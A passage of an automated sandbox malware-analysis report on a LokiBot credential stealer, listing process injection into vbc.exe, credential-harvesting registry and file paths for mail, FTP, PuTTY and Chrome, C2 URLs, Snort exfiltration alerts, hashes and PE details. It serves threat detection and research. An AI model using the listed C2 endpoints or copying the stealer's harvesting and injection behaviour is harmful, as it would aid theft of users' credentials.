          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 415000Jump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 41A000Jump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 4A0000Jump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 2DE008Jump to behavior
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeQueries volume information: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected LokibotShow sources
          Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe PID: 6996, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
          Tries to harvest and steal ftp login credentialsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection411Masquerading1OS Credential Dumping2Security Software Discovery111Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Credentials in Registry1Process Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Local System2Automated ExfiltrationApplication Layer Protocol112Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection411NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Information Discovery13SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe63%VirustotalBrowse
          FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe54%MetadefenderBrowse
          FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe75%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe100%AviraTR/Dropper.Gen2
          FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.0.vbc.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.0.vbc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.0.vbc.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.0.vbc.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.0.vbc.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.0.vbc.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          publicspeaking.co.id9%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
          http://alphastand.win/alien/fre.php0%URL Reputationsafe
          http://publicspeaking.co.id/seun/Panel/five/fre.php6%VirustotalBrowse
          http://publicspeaking.co.id/seun/Panel/five/fre.php0%Avira URL Cloudsafe
          http://alphastand.trade/alien/fre.php0%URL Reputationsafe
          http://www.publicspeaking.co.id/seun/Panel/five/fre.php0%Avira URL Cloudsafe
          https://publicspeaking.co.id/seun/Panel/five/fre.php0%Avira URL Cloudsafe
          http://alphastand.top/alien/fre.php0%URL Reputationsafe
          http://www.ibsensoftware.com/0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          publicspeaking.co.id
          216.239.36.21
          truefalseunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://kbfvzoboss.bid/alien/fre.phptrue
          • URL Reputation: safe
          unknown
          http://alphastand.win/alien/fre.phptrue
          • URL Reputation: safe
          unknown
          http://publicspeaking.co.id/seun/Panel/five/fre.phpfalse
          • 6%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://alphastand.trade/alien/fre.phptrue
          • URL Reputation: safe
          unknown
          http://alphastand.top/alien/fre.phptrue
          • URL Reputation: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.publicspeaking.co.id/seun/Panel/five/fre.phpvbc.exe, 00000004.00000002.291153375.00000000007D8000.00000004.00000020.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://publicspeaking.co.id/seun/Panel/five/fre.phpvbc.exe, 00000004.00000002.291153375.00000000007D8000.00000004.00000020.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://www.ibsensoftware.com/FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          216.239.34.21
          unknownUnited States
          15169GOOGLEUSfalse
          216.239.36.21
          publicspeaking.co.idUnited States
          15169GOOGLEUSfalse

          General Information

          Joe Sandbox Version:34.0.0 Boulder Opal
          Analysis ID:525634
          Start date:20.11.2021
          Start time:21:36:09
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 4m 30s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:25
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@3/3@4/2
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 1.1% (good quality ratio 1.1%)
          • Quality average: 61.5%
          • Quality standard deviation: 24.5%
          HCA Information:
          • Successful, ratio: 98%
          • Number of executed functions: 9
          • Number of non-executed functions: 1
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56
          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          21:37:05API Interceptor2x Sleep call for process: vbc.exe modified

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.log
          Process:C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1088
          Entropy (8bit):5.389592652326326
          Encrypted:false
          SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKh6+84xpNT:MxHKn1qHGiD0HKeGiYHKGD8Ao6+vxpNT
          MD5:4ADB7AB90D6BE2824A5986B25E8CA850
          SHA1:EFA4C824556AFEB86529C4DC162216B114496BE9
          SHA-256:BD9D15C568A8B94720AEDD9259908090E4FFC8961F8EDBF075011C61A3CB39C0
          SHA-512:4B0D4E57DC7EB02AEA99640611B0D11251ADD370A0A053E6481B4931ABF62C161EEAEB526FCC371A5F84898EB1C3F290C7BFDCB6CA50733F434C4E23EA833C81
          Malicious:true
          Reputation:moderate, very likely benign file
          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
          C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          File Type:very short file (no magic)
          Category:dropped
          Size (bytes):1
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3:U:U
          MD5:C4CA4238A0B923820DCC509A6F75849B
          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
          Malicious:false
          Reputation:high, very likely benign file
          Preview: 1
          C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          File Type:data
          Category:dropped
          Size (bytes):46
          Entropy (8bit):1.0424600748477153
          Encrypted:false
          SSDEEP:3:/lbON:u
          MD5:89CA7E02D8B79ED50986F098D5686EC9
          SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
          SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
          SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: ........................................user.

          Static File Info

          General

          File type:MS-DOS executable, MZ for MS-DOS
          Entropy (8bit):6.749521559151111
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          • Win32 Executable (generic) a (10002005/4) 49.97%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
          File size:359690
          MD5:2ae5473d26a235b7ab3ee2d632514d60
          SHA1:40cbf4bffbe3a0c691aaac5e51ab93764958e5b9
          SHA256:fadae8a98643b8305b18d587f3cc16534eacd884e84753c92e1e64c3336d91c3
          SHA512:312097313dbc84c15aa21c92f400db0ff6dd0b96164b184fee237924fcade692199f3e107d1e89d1cf0fc0a8f5e555cce4eb766b8ab4ea3c658cbe6e14be7761
          SSDEEP:3072:7m2CthMHk2YOOOOOuOOOOOOqYOOOOO8GOOOOOOKMooMJMoMFYYYYYYYYYYYYYYNb:Ct+HgjobF4Equ0HQlLU6j7DkZ9ZWnn
          File Content Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.....................................................

          File Icon

          Icon Hash:00828e8e8686b000

          Static PE Info

          General

          Entrypoint:0x402e5e
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Time Stamp:0x4D0126C5 [Thu Dec 9 18:58:13 2010 UTC]
          TLS Callbacks:
          CLR (.Net) Version:v4.0.30319
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

          Entrypoint Preview

          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x2e0c0x4f.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x28da6.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000xc.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x20000xe640x1000False0.5478515625data5.29520838324IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rsrc0x40000x28da60x28e00False0.212520307722data5.09516700999IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x2e0000xc0x200False1.021484375data6.65643552127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          RT_ICON0x42f40x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
          RT_ICON0x14b1c0x94a8dataEnglishUnited States
          RT_ICON0x1dfc40x5488dataEnglishUnited States
          RT_ICON0x2344c0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 8454143, next used block 4294901760EnglishUnited States
          RT_ICON0x276740x25a8dataEnglishUnited States
          RT_ICON0x29c1c0x10a8dataEnglishUnited States
          RT_ICON0x2acc40x988dataEnglishUnited States
          RT_ICON0x2b64c0x468GLS_BINARY_LSB_FIRSTEnglishUnited States
          RT_ICON0x2bab40xea8data
          RT_GROUP_ICON0x2c95c0x14data
          RT_VERSION0x2c9e80x1d4dataEnglishUnited States
          RT_MANIFEST0x2cbbc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

          Imports

          DLLImport
          mscoree.dll_CorExeMain

          Version Infos

          DescriptionData
          LegalCopyrightCopyright VIRTUAL 2017
          ProductNameVirtualController
          FileDescriptionVirtual Controller
          Translation0x0409 0x04b0

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States

          Network Behavior

          Snort IDS Alerts

          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          11/20/21-21:37:03.277833TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974180192.168.2.3216.239.36.21
          11/20/21-21:37:03.277833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.3216.239.36.21
          11/20/21-21:37:03.277833TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.3216.239.36.21
          11/20/21-21:37:03.277833TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974180192.168.2.3216.239.36.21
          11/20/21-21:37:04.623197TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974280192.168.2.3216.239.34.21
          11/20/21-21:37:04.623197TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.3216.239.34.21
          11/20/21-21:37:04.623197TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.3216.239.34.21
          11/20/21-21:37:04.623197TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974280192.168.2.3216.239.34.21
          11/20/21-21:37:05.859359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.3216.239.36.21
          11/20/21-21:37:05.859359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.3216.239.36.21
          11/20/21-21:37:05.859359TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.3216.239.36.21
          11/20/21-21:37:05.859359TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.3216.239.36.21
          11/20/21-21:37:06.967168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.3216.239.34.21
          11/20/21-21:37:06.967168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3216.239.34.21
